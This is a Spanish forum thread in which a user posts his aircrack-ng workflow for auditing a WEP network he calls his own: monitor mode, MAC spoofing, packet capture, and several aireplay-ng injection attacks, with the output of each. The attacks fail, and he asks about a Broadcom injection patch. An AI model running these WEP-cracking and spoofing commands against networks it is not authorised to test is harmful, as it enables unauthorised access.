Hola amigos, en relacion al post anterior pongo lo que hago al auditar las redes y pegare ademas as respuestas que recibo:

airmon-ng start wlan0

respuesta:

Found 5 processes that could cause trouble.

If airodump-ng, aireplay-ng or airtun-ng stops working after

a short period of time, you may want to kill (some of) them!



PID   Name

732   NetworkManager

734   avahi-daemon

736   avahi-daemon

753   wpa_supplicant

1538   dhclient

Process with PID 1538 (dhclient) is running on interface wlan0





Interface   Chipset      Driver



wlan0      Unknown    brcm80211 - [phy0]

            (monitor mode enabled on mon0)


ifconfig mon0

respuesta:

mon0      Link encap:UNSPEC  direcciónHW 00-1B-B1-XX-XX-XX-0A-00-00-00-00-00-00-00-00-00 

          ACTIVO DIFUSIÓN FUNCIONANDO MULTICAST  MTU:1500  Métrica:1

          Paquetes RX:2459 errores:0 perdidos:0 overruns:0 frame:0

          Paquetes TX:0 errores:0 perdidos:0 overruns:0 carrier:0

          colisiones:0 long.colaTX:1000

          Bytes RX:760498 (760.4 KB)  TX bytes:0 (0.0 B)

ifconfig mon0 down

macchanger -m 00:11:22:33:44:55 mon0

Current MAC: 00:1b:b1:XX:XX:XX (unknown)

Faked MAC:   00:11:22:33:44:55 (Cimsys Inc)


ifconfig mon0 up

airodump-ng mon0

control+c

airodump-ng -c 6 -b 00:04:E2:XX:XX:XX -w wep mon0

abro otra consola y realizo un ataque 3:

aireplay-ng -3 -b 00:04:E2:F2:AC:24 -h 00:11:22:33:44:55 mon0

se pone a leer paquetes y el ARP a cero.

En otra consola relaizo una autenticacion falsa, ataque 1:

aireplay-ng -1 0 (tambien voy probando de 5 en 5 desde el 0 hasta el 30) -e SMC -a 00:04:E2:XX:XX:XX -h 00:11:22:33:44:55 mon0

Aqui debo decir que no se me asocia con la MAC fakeada, en la ventana en la que hicimos airodump-ng aparece de STATION ademas de la MAC fakeada, la MAC real de wlan0. Realizo otro ataque 1 con la MAC de wlan y si me asocia. Continuo por tanto con la MAC real. Total es mia la red... Decir que en la consola donde hicimos el ataque 3 sigue leyendo paquetes y ARP a cero.

En la consola donde hicimos la autenticacion falsa hago un ataque 2 para intentar inyectar reinyectar ARPs.

 aireplay-ng -2 -p 0841 -b 00:04:E2:F2:AC:24 -c FF:FF:FF:FF:FF:FF -h 00:11:22:33:44:55 mon0

Se pone a leer paquetes y nada mas, y la consola del ataque 3, el arp a cero tambien y leyendo paquetes como siempre tambien.

Paro esto y realizo otro ataque 2 pero esta vez con el archivo cap que genera.

Respuesta:

aireplay-ng -2 -r replay_arp-0518-*.cap -b 00:04:E2:F2:AC:24 -h 00:11:22:33:44:55 mon0

"aireplay-ng --help" for help.

root@biznaka-R540-R580-R780-SA41-E452-E852:/home/biznaka# aireplay-ng -2 -r replay_arp-0518-035428.cap -b 00:04:E2:F2:AC:24 -h 00:11:22:33:44:55 mon0

End of file.

Tambien pongo esta combinacion en la que pruebo con mi MAC real y pego la respuesta tambien:

root@biznaka-R540-R580-R780-SA41-E452-E852:/home/biznaka# aireplay-ng -2 -r replay_arp-0518-035428.cap -b 00:04:E2:XX:XX:XX -h 00:1B:B1:XX:XX:XX mon0

The interface MAC (00:11:22:33:44:55) doesn't match the specified MAC (-h).

   ifconfig mon0 hw ether  00:1B:B1:XX:XX:XX
End of file.


Bueno, creo que lo que queda ya es hacer lo que tenia que haber hecho, que creo que es el ataque 4, chochop creo que se llama. En la consola del ataque 2, pongo lo siguiente:

aireplay-ng -4 -h 00:11:22:33:44:55 -r  replay_arp-0518-035428.cap mon0

respuesta:

root@biznaka-R540-R580-R780-SA41-E452-E852:/home/biznaka# aireplay-ng -4 -h 00:11:22:33:44:55 -r  replay_arp-0518-035428.cap mon0

End of file.

Y pruebo este mismo ataque con la MAC real y pego tambien la respuesta:

root@biznaka-R540-R580-R780-SA41-E452-E852:/home/biznaka# aireplay-ng -4 -h 00:1B:B1:XX:XX:XX -r  replay_arp-0518-035428.cap mon0

The interface MAC (00:11:22:33:44:55) doesn't match the specified MAC (-h).

   ifconfig mon0 hw ether 00:1B:B1:XX:XX:XX

End of file.


Y llegados a este punto el tcpdump no lo puedo realizar. Imagino que problema estara con las direcciones MAC, o no sé qué decís vosotros? Gracias.

Hola de nuevo:

He probado con la MAC real y tampoco hay diferencia, no consigo mover los ARP de cero. Alguna sugerencia? saludos.

Quisiera lanzar una pregunta o una idea, haber si puede ser la solucion al problema de que con la aplicacion wepcrack pueda auditar redes wep, y con la aircrack no. Wepcrack esta basado en aircrack, o no tiene nada que ver la aplicacion wepcrack con la suite aircrack? Lo digo porque buscando buscando, encontre en las reseñas de la aplicacion aircrack, en el centro de software de ubuntu, que una persona comenta que puede no funcionar esta suite en tarjetas inalambricas Broadcom, que curiosamente es la mia. Puede ser ese el motivo y nos estamos comiendo el tarro innecesariamente?


 Saludos

Hola Amigos:

Revisando el manual de wiki en español sobre aricrack-ng, me he dado cuenta, o creo, que no tengo instalado o metido el parche de inyeccion de paquetes. Meti en su dia el parche que corregia que la tarjeta se pusiera fijado en el canal -1, tambien el de ataque de fragmentacion, pero no el de inyectar paquetes.

Alguien me ayuda a como instalar dicho parche. He encontrado el parche, bcm43xx-injection-linux-2.6.20.patch, pero mi kernel es la version, 2.6.38-8. Debo meter el parche que he encontrado o deberia buscar otro cuya version sea la de la mi so?

En el caso de que sea la que he encontrado, como debería instalarlo? Gracias.